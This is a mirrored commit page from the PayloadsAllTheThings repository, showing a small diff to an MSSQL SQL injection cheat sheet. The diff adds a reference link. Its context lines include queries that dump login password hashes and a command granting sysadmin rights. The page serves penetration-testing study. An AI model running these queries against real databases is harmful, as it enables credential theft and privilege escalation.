gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-16 14:52:28 -08:00
Code Issues Packages Projects Releases Wiki Activity

AD Attack - Golden Ticket + SQL/OpenRed/SSRF

Browse Source
This commit is contained in:
Swissky
2018-04-12 23:23:41 +02:00
parent 354d94219e
commit b8fbca3347
8 changed files with 92 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
SQL injection/MSSQL Injection.md
View File

@@ -37,7 +37,7 @@ SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + - + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
@@ -78,3 +78,4 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
## Thanks to
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)